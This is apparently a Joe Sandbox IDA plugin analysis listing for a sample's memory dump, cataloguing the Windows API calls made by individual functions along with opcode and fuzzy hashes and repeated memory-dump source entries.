                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$FindLoad
                                                                  • String ID: bin
                                                                  • API String ID: 2619053042-2854705901
                                                                  • Opcode ID: 9e540646f44935ccf111df009b3db933e214dc997df41f60f4d3731703041fe4
                                                                  • Instruction ID: 9d8cb5d61aa00d475561c7ecdaaca8325d521027bad4654bdbc150deacd057bb
                                                                  • Opcode Fuzzy Hash: 9e540646f44935ccf111df009b3db933e214dc997df41f60f4d3731703041fe4
                                                                  • Instruction Fuzzy Hash: AFF062723013315BC7219F6AAC889977BADEFD57A2755483AF901C7210C774C80287B4
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 00424727
                                                                    • Part of subcall function 0042509E: RaiseException.KERNEL32(?,?,0042D4D3,004301F4,?,0042E4A8,?,?,?,00424841,0042D4D3,004301F4,00432030,00413E01,0042D4D3,000000FF), ref: 004250CC
                                                                  • __EH_prolog.LIBCMT ref: 00424767
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$ExceptionRaise
                                                                  • String ID: hB$invalid string position$string too long
                                                                  • API String ID: 2062786585-4136523384
                                                                  • Opcode ID: 88d8fa90d7c6c8d718b7f6f7407bcfcb0e3c6434c47ad0064ef0aedc0834ee80
                                                                  • Instruction ID: 11e73fe8e2f787134ba4100129d5177836af9054e9acb309ed81b3bbf2727209
                                                                  • Opcode Fuzzy Hash: 88d8fa90d7c6c8d718b7f6f7407bcfcb0e3c6434c47ad0064ef0aedc0834ee80
                                                                  • Instruction Fuzzy Hash: E1F012B2B101389AC700F7D5E945ADDB774AB18319FD0416BE101B5085DBF85608CB6D
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,00425255,?), ref: 004276FB
                                                                  • InterlockedExchange.KERNEL32(00432200,00000001), ref: 00427779
                                                                  • InterlockedExchange.KERNEL32(00432200,00000000), ref: 004277DE
                                                                  • InterlockedExchange.KERNEL32(00432200,00000001), ref: 00427802
                                                                  • InterlockedExchange.KERNEL32(00432200,00000000), ref: 00427862
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ExchangeInterlocked$QueryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2947987494-0
                                                                  • Opcode ID: 9d0e1f8ca3f94a46a9c43039f82332cbc11742f84446677a94a17d3fc60db3ea
                                                                  • Instruction ID: 69315932293a6f15bc6fa72f35dddf1ea49eabd3a30424e24b4ce32bea02e01f
                                                                  • Opcode Fuzzy Hash: 9d0e1f8ca3f94a46a9c43039f82332cbc11742f84446677a94a17d3fc60db3ea
                                                                  • Instruction Fuzzy Hash: EA510730B086319BDB248B19FAC4B3A73A1AB41724FA5956FD511873E1D3B8EC81C65C
                                                                  APIs
                                                                    • Part of subcall function 004074A0: WaitForSingleObject.KERNEL32(?,000000FF,?,?,00419270,00000002,?,0000000A,00000000,?,?,?,?,?,?,?), ref: 004074AC
                                                                    • Part of subcall function 004074A0: ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074C9
                                                                    • Part of subcall function 004074A0: ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074DD
                                                                    • Part of subcall function 0040B610: ExpandEnvironmentStringsA.KERNEL32(00000006,?,00000104,00000000), ref: 0040B70E
                                                                    • Part of subcall function 0040B610: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B728
                                                                    • Part of subcall function 0040B610: ReadFile.KERNEL32(00000000,004310B8,00000004,?,00000000), ref: 0040B744
                                                                    • Part of subcall function 0040B610: CloseHandle.KERNEL32(00000000), ref: 0040B760
                                                                  • GetProcessHeap.KERNEL32(00000000,00080000,00000001,00000000), ref: 0040BBCA
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0040BBD1
                                                                  • Sleep.KERNEL32(00002710,00000003), ref: 0040BC35
                                                                  • Sleep.KERNEL32(0002BF20,00000000), ref: 0040BD47
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BD77
                                                                  • HeapFree.KERNEL32(00000000), ref: 0040BD7E
                                                                    • Part of subcall function 004074A0: ReleaseMutex.KERNEL32(?,?,0000000A,00000000,?,?,?,?,?,?,?,00000002,00000003,?,0000000A), ref: 004074F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$MutexRelease$FileProcessSleep$AllocCloseCreateEnvironmentExpandFreeHandleObjectReadSingleStringsWait
                                                                  • String ID:
                                                                  • API String ID: 852835205-0
                                                                  • Opcode ID: cb922d948c341c4ec4f5cf48101532b27f292cf533eb1d70b440bbdce6734a4b
                                                                  • Instruction ID: dbe7561af554c473106a4ec3f17350c3c00e3f78ca735fbf8e53c6946bf8a5ce
                                                                  • Opcode Fuzzy Hash: cb922d948c341c4ec4f5cf48101532b27f292cf533eb1d70b440bbdce6734a4b
                                                                  • Instruction Fuzzy Hash: 2D51B3716483415FE710DB61DC85BABBBA4EB95304F04183EF584972E2EB789405CBAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 88afcefbdea34149f5487bb4a4a4e8b1a015dd47fa542d46d12a5e79c65998e6
                                                                  • Instruction ID: 7989a7ec8bd3e7dc296c367a6cca705834e82284c665f1faf7c5f8b3083430bb
                                                                  • Opcode Fuzzy Hash: 88afcefbdea34149f5487bb4a4a4e8b1a015dd47fa542d46d12a5e79c65998e6
                                                                  • Instruction Fuzzy Hash: 09410571F01136ABDF207F67BC888BF7AA4EA45764F91412FF814A2280D73C4D518A9C
                                                                  APIs
                                                                  • lstrlenA.KERNEL32 ref: 0041ADCA
                                                                    • Part of subcall function 0041BC30: WaitForSingleObject.KERNEL32(?,?), ref: 0041BCA3
                                                                    • Part of subcall function 0041BC30: GetOverlappedResult.KERNEL32(000000FF,?,00000001,00000000), ref: 0041BCB8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectOverlappedResultSingleWaitlstrlen
                                                                  • String ID: .$D$T
                                                                  • API String ID: 1203007601-2113802054
                                                                  • Opcode ID: f4b806bf02d42cab6389b1d5623ed4ac62eeef1efafac6ca423e87d2abbb3ba1
                                                                  • Instruction ID: 3bc75d6c25ee899c0d3cbf15c6baa3f2471e4579f1b3dcf940514d54ae42f5c8
                                                                  • Opcode Fuzzy Hash: f4b806bf02d42cab6389b1d5623ed4ac62eeef1efafac6ca423e87d2abbb3ba1
                                                                  • Instruction Fuzzy Hash: 2731C1B621C3C19BC304EA2DD44169FBBD49BE5314F44486FF19583282DB68D548C7AF
                                                                  APIs
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000,?,?,004088C2,?,?,00000000,000000FF,?,00000000), ref: 00407780
                                                                  • SetFilePointer.KERNEL32(00000000,?,00000000,00000000,?,00000001,?,0000000A), ref: 004077A6
                                                                  • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,0000000A), ref: 004077C0
                                                                  • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,0000000A), ref: 004077D0
                                                                  • CloseHandle.KERNEL32(00000000,?,0000000A), ref: 004077D3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: File$Write$CloseCreateHandlePointer
                                                                  • String ID:
                                                                  • API String ID: 2529654636-0
                                                                  • Opcode ID: 9b37f0a862f01d551fb1315119285fc735368d34d06a2e386bcb12519b4e4b4b
                                                                  • Instruction ID: 1453553940a4d3892de4ff384dbac704556b8781b2e4a3aa95a78d14f1d764be
                                                                  • Opcode Fuzzy Hash: 9b37f0a862f01d551fb1315119285fc735368d34d06a2e386bcb12519b4e4b4b
                                                                  • Instruction Fuzzy Hash: 910152B2345210BBF224D665DC85FABB35CFB45B55F604529F301AB1C0D7B0B912866E
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00000000,00429D66,0042754D,00000000,0042E878,00000008,004275A4,?,?,?,004255E1,00000004,0042E528,0000000C,004274A4), ref: 00426F6A
                                                                  • FlsGetValue.KERNEL32(?,004255E1,00000004,0042E528,0000000C,004274A4,00000000,?,0042720A,?,0042E598,00000060), ref: 00426F78
                                                                  • SetLastError.KERNEL32(00000000,?,004255E1,00000004,0042E528,0000000C,004274A4,00000000,?,0042720A,?,0042E598,00000060), ref: 00426FCE
                                                                    • Part of subcall function 0042AF1A: __lock.LIBCMT ref: 0042AF5E
                                                                    • Part of subcall function 0042AF1A: HeapAlloc.KERNEL32(00000008,?,0042EF98,00000010,00426F90,00000001,0000008C,?,004255E1,00000004,0042E528,0000000C,004274A4,00000000,?,0042720A), ref: 0042AF9C
                                                                  • FlsSetValue.KERNEL32(00000000,?,004255E1,00000004,0042E528,0000000C,004274A4,00000000,?,0042720A,?,0042E598,00000060), ref: 00426F9F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00426FB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread__lock
                                                                  • String ID:
                                                                  • API String ID: 3368326513-0
                                                                  • Opcode ID: cf15b98bab8d1defd9364abf7e131804ac3567f7b1877ef76dd4d84766d46405
                                                                  • Instruction ID: f63654c1ee938a50a5afa31d3a4a151140225177cbe4647d27af6bf58e16b5fd
                                                                  • Opcode Fuzzy Hash: cf15b98bab8d1defd9364abf7e131804ac3567f7b1877ef76dd4d84766d46405
                                                                  • Instruction Fuzzy Hash: 42F0FC317017219FDB302F61BE0D6463BE0EF04761B520539F681962E0CBB48805DB5D
                                                                  APIs
                                                                  • SetEvent.KERNEL32(0000011C,?,00000000,00000001,00415108), ref: 0041EF12
                                                                  • SetEvent.KERNEL32(00000128), ref: 0041EF20
                                                                  • SetEvent.KERNEL32(0000012C), ref: 0041EF2B
                                                                  • SetEvent.KERNEL32(00000124), ref: 0041EF36
                                                                  • SetEvent.KERNEL32(00000120), ref: 0041EF41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: Event
                                                                  • String ID:
                                                                  • API String ID: 4201588131-0
                                                                  • Opcode ID: c5f2bf39e6656d233596ec134f051eeb9b07fd22e5f32040d0a10a1e3cd4c5e3
                                                                  • Instruction ID: 92241c2d29be1143f2a9536055d46b80d7f207951b744ccd9958107ee56c1688
                                                                  • Opcode Fuzzy Hash: c5f2bf39e6656d233596ec134f051eeb9b07fd22e5f32040d0a10a1e3cd4c5e3
                                                                  • Instruction Fuzzy Hash: F6F08273710910A7C31896F99C899EAE399FB8C395B45062AEA19D7310CA3CAC1047EC
                                                                  APIs
                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004264B6
                                                                  • GetCurrentProcessId.KERNEL32 ref: 004264C2
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004264CA
                                                                  • GetTickCount.KERNEL32 ref: 004264D2
                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 004264DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                  • String ID:
                                                                  • API String ID: 1445889803-0
                                                                  • Opcode ID: 7df64b2976afb430f347675c980c9b5000278784bc7ff6d537d0765b03531c1e
                                                                  • Instruction ID: 499c131aa02166e40c80eeea4be7d3552c431a5fdd0afb938acd6548f02731da
                                                                  • Opcode Fuzzy Hash: 7df64b2976afb430f347675c980c9b5000278784bc7ff6d537d0765b03531c1e
                                                                  • Instruction Fuzzy Hash: BCF0B271E00124ABDB20EBB5ED4859FB7F8FF08251BC60576D801E7160EA34A9558B88
                                                                  APIs
                                                                  • ResetEvent.KERNEL32(0000011C,?,00000000,00000001,00415134), ref: 0041EF67
                                                                  • ResetEvent.KERNEL32(00000128), ref: 0041EF76
                                                                  • ResetEvent.KERNEL32(0000012C), ref: 0041EF81
                                                                  • ResetEvent.KERNEL32(00000124), ref: 0041EF8C
                                                                  • ResetEvent.KERNEL32(00000120), ref: 0041EF97
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: EventReset
                                                                  • String ID:
                                                                  • API String ID: 2632953641-0
                                                                  • Opcode ID: 4822540d4da0aa7164793d8268a4d29bb95e7092dff5d4a8231710eff046bdde
                                                                  • Instruction ID: fc480dfa26fb09fbbc65d8aef6d91afcac74ba489442c4a45ccb12b9350b78a5
                                                                  • Opcode Fuzzy Hash: 4822540d4da0aa7164793d8268a4d29bb95e7092dff5d4a8231710eff046bdde
                                                                  • Instruction Fuzzy Hash: 8DF039B3211A009BC32096FACCC5EC7A3DAABCC305F190829A21DC3200C93CE8418778
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 00422278
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 0042229B
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 004222BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1742963186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1742947373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1742988255.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743001516.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1743013214.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_document.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID: fwe
                                                                  • API String ID: 3188754299-4005368934
                                                                  • Opcode ID: 9085168eafed1b4902fe1ac0c1bd680c0aa40f9c6ed121b420b30641bbf5303a
                                                                  • Instruction ID: 76594a64a599093f323b53c7ed8c786e31d7372582f6e569f4210dc002227436
                                                                  • Opcode Fuzzy Hash: 9085168eafed1b4902fe1ac0c1bd680c0aa40f9c6ed121b420b30641bbf5303a
                                                                  • Instruction Fuzzy Hash: CE315B3160879157CB21D6347820BFBF7D1AFD4300FA00B69E8D8C3281DBB69845C396
                                                                  APIs
